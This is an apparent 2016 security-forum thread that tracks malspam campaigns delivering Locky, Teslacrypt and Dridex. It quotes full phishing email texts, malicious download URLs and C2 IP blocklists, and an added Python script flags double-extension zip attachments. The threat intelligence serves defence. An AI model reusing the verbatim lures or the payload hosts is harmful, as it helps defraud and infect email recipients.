Edit: after a bit of digging around, it appears that the NEWSITEDNS2 .RU has previously been used for Amex and other bank phishing attacks. It is suggested that you -block- their IP numbers to prevent further and future problems:
    155.94.169.106 VirusTotal*
    104.168.62.233 VirusTotal**
    50.2.26.16 VirusTotal***
    148.163.173.227
    192.210.203.49

Either the DNS has not propagated yet worldwide or the DNS service has pulled the domains. My gut feeling is that the bots have sent the emails too early before the sites were live. The date & time on the emails say Wed 30/09/2015 13:32. I received about -50- copies of these between 03.20 and 03.30 UTC. Be aware and watch out for when these do go live, probably later today...

Screenshot: http://myonlinesecur...ng-1024x558.png "

* https://www.virustot...06/information/

** https://www.virustot...33/information/

*** https://www.virustot...16/information/
___

Some Tips for Preventing Ransomware
- https://isc.sans.edu...l?storyid=20821
Last Updated: 2016-03-09 - "... 'get asked a lot by clients is "how can I prepare/prevent an infection?"
'Prepare' is a good word in this case, it encompasses both prevention and setting up processes for dealing with the infection that will inevitably happen in spite of those preventative processes.  Plus it's the first step in the Preparation / Identification / Containment / Eradication / Restore Service / Lessons Learned Incident Handling process (see SANS SEC 504*..)
* https://www.sans.org...cident-handling
... best advice is - look at how the infection happens, and make this as difficult as possible for the attacker, the same as you would try to prevent any malware. Most malware these days outsources the delivery mechanism - so Cryptowall is typically delivered by an exploit "kit". These days, that typically means the Angler, Rig, or maybe Nuclear exploit kits (Angler being the most prevalent at the moment). These kits aren't magic, they generally try to exploit -old- versions of Java, Flash, Silverlight or take advantage of -missing- Windows updates... When patches come out, the authors of these kits reverse-the-patches and bolt the exploits into their kit..."
(More detail at the isc-diary URL at the top of this post.)
 



Edited by AplusWebMaster, 09 March 2016 - 12:41 PM.

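Several runs in this post and the one before it follow the same pattern: a zip whose name ends in a document or audio extension (".PDF.ZIP", ".wav.zip") or carries a bland "SCAN_" or "DOC-" prefix, containing one or two randomly named .js files that Windows runs with WSH on double-click once "show known file extensions" hides what they are. The script below is an added example, not code from the forum post or the quoted blogs: a mail-gateway style check that flags double-extension names and executable members inside zip attachments, written in Python with only the standard library. The attachments are constructed in memory with placeholder contents; none of the real scripts from the spam runs are reproduced.

```python
"""Flag zip attachments that hide a script behind a document-looking name.

Added example, not code from the forum post or the quoted blogs. The sample
attachments are constructed in memory and their members are placeholder text,
not the real downloaders from the spam runs.
"""
import io
import zipfile

# Extensions Windows will execute on double-click (WSH scripts, PE, macro docs).
EXECUTABLE_EXTENSIONS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "exe",
                         "scr", "cmd", "bat", "docm", "xlsm"}
# Extensions used as the visible decoy in names like invoice.PDF.ZIP or x.wav.zip.
DECOY_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "jpg", "png", "txt"}
ARCHIVE_EXTENSIONS = {"zip", "rar", "7z"}


def extensions(name):
    """All dotted suffixes of a file name, lower-cased: 'a.PDF.ZIP' -> ['pdf', 'zip']."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base.split(".")[1:]


def double_extension(name):
    """True for <anything>.<decoy doc type>.<archive or executable>."""
    exts = extensions(name)
    return (len(exts) >= 2
            and exts[-2] in DECOY_EXTENSIONS
            and exts[-1] in EXECUTABLE_EXTENSIONS | ARCHIVE_EXTENSIONS)


def inspect_zip(data):
    """Findings for one zip attachment: executable members, decoy-named members."""
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid zip archive (possibly a renamed executable or RAR)"]
    with archive:
        for info in archive.infolist():
            exts = extensions(info.filename)
            if exts and exts[-1] in EXECUTABLE_EXTENSIONS:
                findings.append(f"{info.filename}: executable member (.{exts[-1]})")
            if double_extension(info.filename):
                findings.append(f"{info.filename}: double extension inside archive")
    return findings


def triage(attachment_name, data):
    """All findings for an attachment; an empty list means nothing matched."""
    findings = []
    if double_extension(attachment_name):
        findings.append(f"{attachment_name}: decoy document extension before the real one")
    findings.extend(inspect_zip(data))
    return findings


def make_zip(members):
    """Build a zip in memory from {member_name: text}; used only for the samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member_name, text in members.items():
            zf.writestr(member_name, text)
    return buf.getvalue()


# Constructed samples shaped like the attachment names quoted in the posts.
SAMPLES = {
    "Pay_Advice_Vendor_0000300320_1000_for_03.03.2016.PDF.ZIP":
        make_zip({"LQO1169369605.js": "// placeholder, not the real downloader"}),
    "44163311902_20160309_91981473.wav.zip":
        make_zip({"WED2970789413.js": "// placeholder"}),
    "SCAN_00_242852.zip":
        make_zip({"accent.670345320.js": "// placeholder",
                  "email.141350705.js": "// placeholder"}),
    "minutes.zip":
        make_zip({"minutes.pdf": "%PDF-1.4 placeholder"}),
}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        hits = triage(name, data)
        print(("BLOCK " if hits else "allow ") + name)
        for hit in hits:
            print("   ", hit)
```

The name check alone is not enough: SCAN_00_242852.zip has a perfectly ordinary name and is only caught by opening the archive and looking at its members, which is why both checks run. RAR attachments like the FedEx sample (US45928460284.rar) fall through to the "not a valid zip" finding; a production filter would hand those to a RAR reader rather than stop there.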


#1672 AplusWebMaster
Posted 10 March 2016 - 06:09 AM

FYI...

Fake 'random invoice' SPAM - doc macro leads to unknown malware
- http://myonlinesecur...nknown-malware/
10 Mar 2016 - "An email with random invoice or bill subjects coming from random names and email addresses with a malicious word doc attachment is another one from the current bot runs... A high proportion of these are -not- getting caught by the spam or content filters because they pass SPF & DKIM authentication checks. These have a load of different subjects that include:
    Re: Important Notice About Created Invoice
    Urgent Notification About New Bill
    Re: Last Notice About Paid Bill
    Fwd: Important Message About Unpaid Invoice
    Fwd: Urgent Notice About Paid Bill
    Last Notification About Created Bill
    Fw: Last Message About Last Bill
    Fwd: Urgent Message About New Invoice
    Re: Urgent Message About Created Invoice
    Fw: Last Notification About Unpaid Invoice
The email looks like:
From: Reece Solis <acc@ hai-van .com>
Date: Thu 10/03/2016 04:58
Subject: Re: Important Notice About Created Invoice
Attachment: 4KEEY46Y.doc
    Pls review the report attached.
    Reece Solis

-or-
    check the invoice attached.
    Stuart Sweet

-or
    see the report in attachment.
    Odysseus Mcmillan


10 March 2016: 4KEEY46Y.doc -  Current Virus total detections: [1] [2]..
.. MALWR [3] [4] shows downloads from http ://hoosierpattern .com/a1.jpg?Df1iQh0PABlsu=38 which is a jpg that contains embedded malware that is extracted via the macro & a dropped vbs file to give 339.exe (VirusTotal 4/57*)...
Update: I am reliably informed that this is Dridex banking Trojan and an alternative download location is http ://darrallmacqueen .com/b2.jpg?JzKE5CmWJZnG=
... The jpg it downloads looks like this (screenshot to avoid risks):
> http://myonlinesecur.../03/hoosier.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1457590567/

2] https://www.virustot...sis/1457586170/

3] https://malwr.com/an...TZkNzc0YjAzMDY/
Hosts
172.231.69.95
216.194.172.222: https://www.virustot...22/information/
>> https://www.virustot...343b9/analysis/

4] https://malwr.com/an...TAxMjdkYmZkOGE/
Hosts
172.231.69.95
216.194.172.222


* https://www.virustot...sis/1457591438/

5] https://www.reverse....environmentId=1

6] https://www.reverse....environmentId=4

- http://blog.dynamoo....out-unpaid.html
10 Mar 2016 - "... examples can be seen here*...
* http://myonlinesecur...nknown-malware/
... the only mitigating step I can think of is to -block- traffic to darrallmacqueen .com which should stop the files downloading."

darrallmacqueen .com: 185.9.51.4: https://www.virustot....4/information/

hoosierpattern .com: 216.194.172.222: https://www.virustot...22/information/
>> https://www.virustot...343b9/analysis/
___

Fake 'Attached File' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...eads-to-dridex/
10 Mar 2016 - "An email with the subject of 'Attached File / Attached Doc / Attached Document' pretending to come from a scanner or printer at your own domain with a zip attachment is another one from the current bot runs which downloads what looks like Dridex banking Trojan - EDIT: it is LOCKY ransomware not Dridex... The attachment name is created from the recipients email address and 2 sets of random numbers. So far I have seen these sent from:
    epson@ victimdomain .tld
    canon@ victimdomain .tld
    xerox@ victimdomain .tld
    copier@ victimdomain .tld
    scanner @victimdomain .tld
The email looks like:
From: epson@ victim domain .tld
Date: Thu 10/03/2016 07:11
Subject: Attached File / Attached Doc / Attached Document
Attachment: xerox.994@ thespykiller .co.uk_385010_151064713.zip


Body content: totally -empty- blank body

10 March 2016: xerox.994@thespykiller.co.uk_385010_151064713.zip: Extracts to: IIE1525816908.js
Current Virus total detections 5/57*
.. MALWR** shows a download of what looks like Dridex banking Trojan from http ://buyfuntees .com/system/logs/7t6f65g.exe (VirusTotal 5/56***) Update: it is Locky ransomware not Dridex. Dynamoo's blog[4] has these additional download locations:
behrozan .ir/system/logs/7t6f65g.exe
fashion-boutique .com.ua/system/logs/7t6f65g.exe
fortyseven .com.ar/system/logs/7t6f65g.exe  (VirusTotal 1/56[5])
iwear .md/system/logs/7t6f65g.exe
lady-idol.6te .net/system/logs/7t6f65g.exe
ncrweb .in/system/logs/7t6f65g.exe
xn--b1afonddk2l .xn--p1ai/system/logs/7t6f65g.exe ..."

* https://www.virustot...sis/1457597941/

** https://malwr.com/an...GFkMzA2MzIwMzk/
Hosts
67.225.233.214
91.219.30.254


*** https://www.virustot...sis/1457598134/
TCP connections
91.234.33.149: https://www.virustot...49/information/

4] http://blog.dynamoo....ached-file.html
10 Mar 2016 - "This spam has a malicious attachment. It appears to come from within the sender's own-domain. There is no-body-text.
    From:    canon@ victimdomain .tld
    Date:    10 March 2016 at 09:02
    Subject:    Attached File


... Sender is canon or copier or epson or scanner or xerox at the victim's domain.
Recommended blocklist:
31.184.196.78
78.40.108.39
91.219.30.254
91.234.33.149
"

5] https://www.virustot...sis/1457604744/
TCP connections
31.184.196.78: https://www.virustot...78/information/
___

Fake 'Unpaid Issue' SPAM - JS malware leads to Teslacrypt
- http://myonlinesecur...-to-teslacrypt/
10 Mar 2016 - "An email with the subject of 'GreenLand Consulting Unpaid Issue No. 14599' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads teslacrypt... The email looks like:
From: Goldie dawson <dawsonGoldie888@ lamelba .fr>
Date: Thu 10/03/2016 13:28
Subject: GreenLand Consulting   Unpaid Issue No. 14599
Attachment: Invoice_ref-99527554.zip
    Dear Client!
    For the third time we are reminding you about your unpaid debt.
    You used to ask for our advisory services in July 2015, the receipt issued to you was recognized in our database with No. 14599. But it has never been paid off.
    We enclose the detailed bill for your recollection and sincerely hope that you will act nobly and responsibly.
    Otherwise we will have to start a legal action against you.
    Respectfully,
    Goldie dawson
    Chief Accountant ...


10 March 2016: Invoice_ref-99527554.zip: Extracts to: invoice_copy_AczFAX.js - Current Virus total detections 3/57*
.. MALWR** shows a download of Teslacrypt from http ://hellomississmithqq .com/69.exe?1 (VirusTotal ***)
.. This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a DOC or other normal file instead of the .exe/JS file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457616298/

** https://malwr.com/an...zMxYjM5ZGU5YjQ/


*** https://www.virustot...sis/1457617418/

- http://blog.dynamoo....consulting.html
10 Mar 2016 - "This -fake- financial spam comes with a malicious attachment:
From:    Jennie bowles
Date:    10 March 2016 at 12:27
Subject:    GreenLand Consulting – Unpaid Issue No. 58833
Dear Client!
For the third time we are reminding you about your unpaid debt.
You used to ask for our advisory services in July 2015, the receipt issued to you was recognized in our database with No. 58833. But it has never been paid off.
We enclose the detailed bill for your recollection and sincerely hope that you will act nobly and responsibly.
Otherwise we will have to start a legal action against you.
Respectfully,
Jennie bowles
Chief Accountant ...


... scripts attempt to download a malicious binary... Recommended blocklist:
"
 

:ph34r: :ph34r:   <_<


Edited by AplusWebMaster, 10 March 2016 - 08:33 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1673 AplusWebMaster


Posted 11 March 2016 - 07:22 AM

FYI...

Fake 'Amazon order' SPAM - JS malware leads to Locky Ransomware
- http://myonlinesecur...cky-ransomware/
11 Mar 2016 - "An email with the subject of 'Your Amazon order #204-217966-773659' [random numbered] pretending to come from AMAZON.COM <no-reply@ Amazon .com> with a zip attachment is another one from the current bot runs which downloads Locky ransomware...

Screenshot: http://myonlinesecur...59-1024x656.png

11 March 2016: ORD204-217966-773659.zip: Extracts to: ZGQ8748487803.js - Current Virus total detections 6/57*
.. MALWR** shows a download of Locky ransomware from http ://onsancompany .com/system/logs/uy78hn654e.exe
(VirusTotal 5/57***). Other download locations so far discovered for Locky today include:
... This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a DOC or other normal file instead of the .exe/JS file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457692698/

** https://malwr.com/an...zU3OWVlZTZjNDg/
Hosts
103.18.4.151
31.184.196.78
91.219.30.254


*** https://www.virustot...sis/1457691942/
TCP connections
31.184.196.75: https://www.virustot...75/information/


- http://blog.dynamoo....-order-137.html
11 Mar 2016 - "This fake Amazon spam comes with a malicious attachment:
    From:    AMAZON.COM [Mailer-daemon@ amazon .com]
    Date:    11 March 2016 at 09:09
    Subject:    Your Amazon order #137-89653734-2688148
    Hello,
    Thank you for your order. We'll let you know once your item(s) have dispatched. You can check the status of your order or make changes to it by visiting Your Orders on Amazon.com.
    Order Details
    Order #137-89653734-2688148 Placed on March 11, 2016
    Order details and invoice in attached file.
    Need to make changes to your order? Visit our Help page for more information and video guides.
    We hope to see you again soon.
    Amazon .com


Reference numbers vary from email to email. Attached is a file with a name similar to ORD137-89653734-2688148.zip which contains a malicious script... Recommended blocklist:
31.184.196.75
91.219.30.254
78.40.108.39
31.184.196.78
91.234.32.192
"
___

Fake 'Scanned image' SPAM - leads to malware
- http://blog.dynamoo....image-data.html
11 Mar 2016 - "This -fake- document scan leads to malware. It appears to come from within the victim's own domain, but this is a trivial forgery.
    From:    admin [lands375@ victimdomain .tld]
    Date:    11 March 2016 at 09:02
    Subject:    Scanned image
    Image data in PDF format has been attached to this email.


Attached is a document named in a similar format to 11-03-2016-6440705503.zip which contains a randomly-named malicious script. So far I have seen -three- versions of this script (VirusTotal results [1] [2] [3]) which according to the Malwr reports [4].. download a malicious binary from:
ghayatv .com/system/logs/uy78hn654e.exe
This is Locky ransomware, the -same- as dropped in this other spam run* - that post also contains a list of C2s to block."
* http://blog.dynamoo....-order-137.html

1] https://www.virustot...sis/1457690743/

2] https://www.virustot...5c931/analysis/

3] https://www.virustot...sis/1457691017/

4] https://malwr.com/an...WM3ZjcyYWUzM2E/
___

Fake 'Payment' SPAM - leads to Locky ransomware
- http://myonlinesecur...cky-ransomware/
11 Mar 2016 - "An email with the subject of 'Pay for driving on toll road, invoice #00212297' [random numbered]  coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Locky ransomware.. The email looks like:
From: Inez Harding <HardingInez04459@ jazztel .es>
Date: Fri 11/03/2016 08:15
Subject: FW: Payment 16-03-#280729
Attachment: payment_doc_280729.zip
    Dear voicemail,
    We have received this documents from your bank, please review attached documents.
    Yours sincerely,
    Inez Harding
    Account Manager


5 March 2016: payment_doc_280729.zip: Extracts to 2 files:
Post_Tracking_Label_id00-371904814#.js [VT*] [VT**]. MALWR [1] [2] shows -both- download Locky Ransomware from http ://50.28.211.199 /hdd0/89o8i76u5y4 (VirusTotal 5/56***). I am informed[3] that there are several other download locations, all of which appear to be offering a slightly -different- Locky ransomware download... This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a DOC or other normal file instead of the .exe/JS file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457687806/

** https://www.virustot...sis/1457687807/

1] https://malwr.com/an...jcxZGYwZTM0YjE/
Hosts
50.28.211.199
31.184.196.78
91.234.32.192


2] https://malwr.com/an...zQ4NTljYmRkZjE/
Hosts
50.28.211.199
91.234.33.149
31.184.196.78
31.184.196.75


*** https://www.virustot...sis/1457689671/
TCP connections
91.219.30.254: https://www.virustot...54/information/

3] http://blog.dynamoo....-507586-we.html
11 Mar 2016 - "These spam messages come from various senders with different references and attachment names.
    From:    Thanh Sears
    Date:    11 March 2016 at 10:29
    Subject:    FW: Payment 16-03-#507586
    Dear [redacted],
    We have received this documents from your bank, please review attached documents.
    Yours sincerely,
    Thanh Sears
    Financial Manager


Attached is a ZIP file named in the format payment_doc_507586.zip, containing a randomly named script... The dropped binaries are actually different [1] [2] and both look like Locky ransomware. The C2s to -block- are the same as found in this earlier Locky run*..."
1] https://www.virustot...sis/1457693183/

2] https://www.virustot...sis/1457693194/

* http://blog.dynamoo....-order-137.html
___

Massive Volume of Ransomware Downloaders being Spammed
- https://www.trustwav...-being-Spammed/
March 9, 2016 - "We are currently seeing extraordinarily huge volumes of JavaScript attachments being spammed out, which, if clicked on by users, lead to the download of a ransomware. Ransomware encrypts data on a hard drive, and then demands payment from the victim for the key to decrypt the data. Our Spam Research Database saw around 4 million malware spams in the last -seven- days, and the malware category as a whole accounted for 18% of total spam arriving at our spam traps... your last line of defense against ransomware infection is always having an up to date and good backup process."
 

:ph34r: :ph34r:   <_<


Edited by AplusWebMaster, 11 March 2016 - 01:26 PM.



#1674 AplusWebMaster


Posted 12 March 2016 - 09:06 AM

FYI...

Fake 'Urgent Notice' SPAM - JS malware leads to Teslacrypt
- http://myonlinesecur...ypt-ransomware/
Last revised 12 March 2016 - "An email with the subject of 'Urgent Notice # 96954696' [random numbered]  coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads teslacrypt or locky ransomware...
Update 12 March 2016: Unusual for a Saturday.. they are going after the domestic/consumer market instead of office/Enterprise/companies. Another big malspam run of this email today with malicious js attachments (VirusTotal 12/57*). (MALWR**) with a connection to and download of http ://joecockerhereqq .com/80.exe?1 (VirusTotal 5/57***). This definitely looks like Teslacrypt...
WARNING: following the MALWR links will give a browser warning in ALL browsers. Their SSL certificate -expired- yesterday, 11 March 2016. In this case -ONLY- it is safe to ignore the warning and visit the site until they install the updated certificate.. The email looks like:
From: Lacy eaton <eatonLacy97994@ listenary .com>
Date: Fri 11/03/2016 20:42
Subject: Urgent Notice # 96954696
Attachment: statistic_96954696.zip
    Dear Customer!
    According to our data you owe our company a sum of $877,13. There are records saying that you have ordered goods in a total amount of $ 877,13 in the third quarter of 2015.
    Invoice has been paid only partially. The unpaid invoice #96954696 is enclosed below for your revision.
    We are writing to you, hoping for understanding and in anticipation of the early repayment of debt.
    Please check out the file and do not hesitate to pay off the debt.
    Otherwise we will have to start a legal action against you.
    Regards,
    Lacy eaton ...


11 March 2016: statistic_96954696.zip: Extracts to: details_jEpMnR.js - Current Virus total detections [4] .. MALWR[5] shows a download of teslacrypt or locky from http ://joecockerhereqq .com/69.exe?1 or http ://joecockerhereff .com/69.exe?1 (VirusTotal [6]) Payload Security Hybrid analysis [7]... This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a DOC or other normal file instead of the .exe/JS file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457728759/

** https://malwr.com/an...DJhN2U0MTMzYTU/
Hosts
54.212.162.6
203.124.115.1
166.62.4.223


*** https://www.virustot...sis/1457772426/
TCP connections
203.124.115.1: https://www.virustot....1/information/
166.62.4.223: https://www.virustot...23/information/

4] https://www.virustot...sis/1457728932/

5] https://malwr.com/an...mM0NGNmZWZlNWE/
Hosts
212.119.87.77
204.44.102.164


6] https://www.virustot...sis/1457731360/
TCP connections
91.219.30.254: https://www.virustot...54/information/

7] https://www.hybrid-a...environmentId=1
91.234.32.192: https://www.virustot...92/information/
>> https://www.virustot...fd9c6/analysis/

- http://blog.dynamoo....e-78815053.html
12 Mar 2016 - "This spam comes from random senders, and has random references, dollar amounts and attachment names:
    From:    Donnie emily
    Date:    12 March 2016 at 14:01
    Subject:    Urgent Notice # 78815053
    Dear Customer!
    According to our data you owe our company a sum of $452,49. There are records saying that you have ordered goods in a total amount of $ 452,49 in the third quarter of 2015.
    Invoice has been paid only partially. The unpaid invoice #78815053 is enclosed below for your revision.
    We are writing to you, hoping for understanding and in anticipation of the early repayment of debt.
    Please check out the file and do not hesitate to pay off the debt.
    Otherwise we will have to start a legal action against you.
    Regards,
    Donnie emily ...


Attached is a randomly-named ZIP file, in the sample I have seen... plus a random string of characters. I have seen -six- versions of this script... This is Teslacrypt ransomware, although it is possible that some variants of this message may drop Locky. Both these binaries are slightly different... malicious domains are also on the same servers... there are a vast number of malicious IPs and servers in this cluster...
Recommended blocklist:
"
___

Malvertising Magnitude ...
- https://labsblog.f-s...de-exploit-kit/
Mar 7, 2016 - "... we noticed yet another malvertising campaign... pushing users towards Magnitude exploit kit:
> https://newsfromthel...png?w=752&h=367
... we found with one of the ad platforms, click2.danarimedia .com, is that it is also being used by some distribution of Conduit Toolbars, which is considered 'potentially unwanted' as they usually come bundled with free software and -forces- changes to browser settings... The -redirection- from our upstream from the -same- ad platform to Magnitude EK... we should not underestimate the power of Potentially Unwanted Applications (PUA). Because even if a program started as potentially unwanted, it doesn’t mean that attackers could not take advantage of it in delivering other threats to the user’s machine. It is very possible that users could get redirected to exploit kits and eventually end up with a malware infection, which, for this particular exploit kit, is CryptoWall ransomware:
> https://newsfromthel...png?w=799&h=600 "
... -ongoing- today.

click2.danarimedia .com: 199.212.255.138: https://www.virustot...38/information/
199.212.255.137
199.212.255.136
199.212.255.140
199.212.255.139

 

:ph34r: :ph34r:   <_<


Edited by AplusWebMaster, 12 March 2016 - 04:54 PM.



#1675 AplusWebMaster


Posted 14 March 2016 - 06:24 AM

FYI...

Fake 'Blocked Transaction' SPAM - leads to Teslacrypt
- http://blog.dynamoo....ction-case.html
14 Mar 2016 - "This -fake- financial transaction has a malicious attachment:
    From:    Judy brittain
    Date:    14 March 2016 at 08:12
    Subject:    Blocked Transaction. Case No 19706002
    The Automated Clearing House transaction (ID: 19706002), recently initiated from your online banking account, was rejected by the other financial institution.
    Canceled ACH transaction
    ACH file Case ID: 09293
    Transaction Amount: 607,89 USD
    Sender e-mail: brittainJudy056@ panick .com.ar
    Reason of Termination: See attached statement


The sender's name, references and dollar amounts vary from message to message. The attachment names are randomly-generated (the format seems the same as this*) containing either one-or-four malicious scripts. According to this analysis** the scripts download from:
ohelloguyzzqq .com/85.exe?1
Although the infection mechanism seems the same as this spam run*, the MD5 of the dropped executable is now 57759F7901EBA73040597D4BA57D511A with a detection rate of 2/55***. This is Teslacrypt ransomware, and I recommend that you block traffic to the IP addresses listed here*."
* http://blog.dynamoo....tomer-case.html

** https://www.hybrid-a...environmentId=1

*** https://www.virustot...sis/1457945732/
___

Fake 'Credit details' SPAM - leads to Teslacrypt
- http://blog.dynamoo....d-87320357.html
14 Mar 2016 - "So many -Teslacrypt- campaigns, so little time...
From:    Ladonna feather
Date:    14 March 2016 at 14:50
Subject:    Credit details ID: 87320357
Your credit card has been billed for $785,97. For the details about this transaction, please see the ID: 87320357-87320357 transaction report attached.
NOTE: This is the automatically generated message. Please, do not reply.


... names, references and attachment names vary.. malicious scripts in the attachment...
This is Teslacrypt ransomware...
Recommended blocklist:
54.212.162.6: https://www.virustot....6/information/
212.119.87.77: https://www.virustot...77/information/
78.135.108.94: https://www.virustot...94/information/
washitallawayff .com: 31.128.86.113

___

Fake 'IMG from Admin' SPAM - JS malware leads to locky or Dridex
- https://myonlinesecu...ocky-or-dridex/
14 Mar 2016 - "An email with the subject of 'Emailing: IMG_18977' [random numbered] pretending to come from admin-at-your-own-email-domain with a zip attachment is another one from the current bot runs which downloads what looks like either Locky ransomware or Dridex banking Trojan... The email looks like:
From: admin  admin@ victim domain .tld
Date: Mon 14/03/2016 12:14
Subject:  Emailing: IMG_18977
Attachment: IMG_18977.zip
    Your message is ready to be sent with the following file or link attachments:
    IMG_18977
    Note: To protect against computer viruses, e-mail programs may prevent sending or receiving certain types of file attachments. Check your e-mail security settings to determine how attachments are handled.
    Please consider the environment before printing this email.
    E-mail messages may contain viruses, worms, or other malicious code. By reading the message and opening any attachments, the recipient accepts full responsibility for taking protective action against such code. Henry Schein is not liable for any loss or damage arising from this message...


14 March 2016: IMG_18977.zip: Extracts to: ICG8994683408.js - Current Virus total detections 4/56*
... unable to get any analysis from automatic analysers, both MALWR and Hybrid analysis are down at the moment... Manual analysis of the javascript file shows it connects to
http ://lampusorotmurah .com/system/logs/78tgh76.exe (VirusTotal 3/57**) which is inconclusive but is likely to be either Dridex banking Trojan or Locky ransomware... This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a DOC or other normal file instead of the .exe/JS file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457961662/

** https://www.virustot...sis/1457962014/

lampusorotmurah .com: 72.34.33.170: https://www.virustot...70/information/
>> https://www.virustot...d52f8/analysis/
___

Fake 'blank email' SPAM - JS malware downloads kovter boaxxe and ransomware
- https://myonlinesecu...and-ransomware/
14 Mar 2016 - "An email addressed to 'abuse' at your-email-domain with -no- subject coming from Support <support@ hvp-online .com> with a zip attachment is another one from the current bot runs... The email looks like:
From: Support <support@ hvp-online .com>
Date: Mon 14/03/2016 08:51
Subject: blank
Attachment: 0000783426.zip


Body content: Totally empty

14 March 2016: 0000783426.zip: Extracts to: 0000783426.doc.js - Current Virus total detections 13/57*  
.. ReverseIt** and Wepawet*** show a download of -3- files from a combination of these locations which will be Boaxxe, Kovter and some sort of ransomware:
    nueva.alite .eu
    arbasal .com
    app.ulled .com
    norbert.thecua.perso .sfr.fr
    diarga.fall.perso.neuf .fr
... This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a DOC or other normal file instead of the .exe/JS file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457947548/

** https://www.reverse....environmentId=4
Host Address
91.142.215.21
87.106.240.27
217.111.217.243
86.65.123.70
173.201.146.128


*** https://wepawet.isec...18e9511&type=js
___

Fake 'Traffic Violation' SPAM - leads to Teslacrypt
- http://blog.dynamoo....d-62699928.html
14 Mar 2016 - "This -fake- legal email has a malicious attachment:
    From:    Myrna baker
    Date:    14 March 2016 at 15:58
    Subject:    Traffic report ID: 62699928
    Dear Citizen,
    We are contacting you on behalf of a local Traffic Violation Bureau.
    Our cameras have detected that the driver of the vehicle associated with your personal number on March 10th, 2016 has committed a violation of the rules with a code: 49757
    Unfortunately, we will have no other option rather than passing this case to the local police authorities.
    Please, see the report with the documents proofs attached for more information on this case.


Details in the email vary from message to message. The payload is Teslacrypt ransomware, as seen in this earlier spam run*."
* http://blog.dynamoo....d-87320357.html

- https://myonlinesecu...-to-ransomware/
14 March 2016: post_scan_02271147.zip: Extracts to: accent_nUIboL.js - Current Virus total detections 4/56*  reverseIT** shows a download of what is probably Teslacrypt from
 giveitallhereqq .com/69.exe?1 (VirusTotal 4/56***)
* https://www.virustot...sis/1457965942/

** https://www.hybrid-a...environmentId=1
Host Address
54.212.162.6: https://www.virustot....6/information/
>> https://www.virustot...5f869/analysis/

*** https://www.virustot...sis/1457974614/
TCP connections
198.1.95.93: https://www.virustot...93/information/
___

Fake 'Debt#' SPAM - JS malware leads to Teslacrypt
- https://myonlinesecu...-to-teslacrypt/
13 Mar 2016 - "An email with the subject of 'Debt #80574, Customer Case Nr.: 693' [random numbered] coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads what looks like Teslacrypt... The email looks like:
From: Tanya best <bestTanya09673@ bezeqint .net>
Date: Sun 13/03/2016 16:14
Subject: Debt #80574 , Customer Case Nr.: 693
Attachment: money_44821787.zip
Body content:
    Dear Customer,
    Despite our constant reminders, we would like to note that the mentioned debt #80574 for $500,74 is still overdue for payment.
    We would appreciate your cooperation on this case and ask you to make the payment as soon as possible.
    Unless the full payment is received by April 1st, 2016 this case will be transferred to the debt collection agency, will seriously damage your credit rating.
    Please, find the attachment enclosed to the letter below.
    We hope on your understanding.
    Kind regards,
    Finance Department
    Tanya best ...


13 March 2016: money_44821787.zip: Extracts to: -4- different named but identical js files by #
Current Virus total detections 1/57*. SecureIT** shows a download of what appears to be Teslacrypt from
 ohelloguyqq .com/70.exe (VirusTotal 4/57***)
JS files from zip I got were Post_Parcel_Label_id00-611695718#.js
Post_Shipment_Label_id00-436290447#.js
Post_Tracking_Label_id00-503290854#.js
Post_Tracking_Label_id00-993809340#.js
... This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a DOC or other normal file instead of the .exe/JS file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1457889197/

** https://www.reverse....environmentId=4
78.135.108.94: https://www.virustot...94/information/

*** https://www.virustot...sis/1457890122/

- http://blog.dynamoo....tomer-case.html
13 Mar 2016 - "The details in these spam messages vary, with different reference numbers, sender names and dollar amounts. They all have malicious attachments...
From:    Lamar drury
Date:    13 March 2016 at 18:43
Subject:    Debt #85533 , Customer Case Nr.: 878
Dear Customer,
Despite our constant reminders, we would like to note that the mentioned debt #85533 for $826,87 is still overdue for payment.
We would appreciate your cooperation on this case and ask you to make the payment as soon as possible.
Unless the full payment is received by April 1st, 2016 this case will be transferred to the debt collection agency, will seriously damage your credit rating.
Please, find the attachment enclosed to the letter below.
We hope on your understanding.
Kind regards,
Finance Department
Lamar drury ...


Attached is a ZIP file... plus a random number. Inside are one-to-four malicious .js scripts... There are at least -22- unique scripts... These appear [1] [2] to download a malicious binary from one of the following locations:
ohelloguyff .com/70.exe
ohelloguyzzqq .com/85.exe?1
Of these, only the 85.exe download is working for me at the moment which is Teslacrypt ransomware. This has a detection rate of just 1/56*... Recommended blocklist:
"

1] https://www.hybrid-a...environmentId=4

2] https://www.hybrid-a...environmentId=1

* https://www.virustot...sis/1457899296/
___

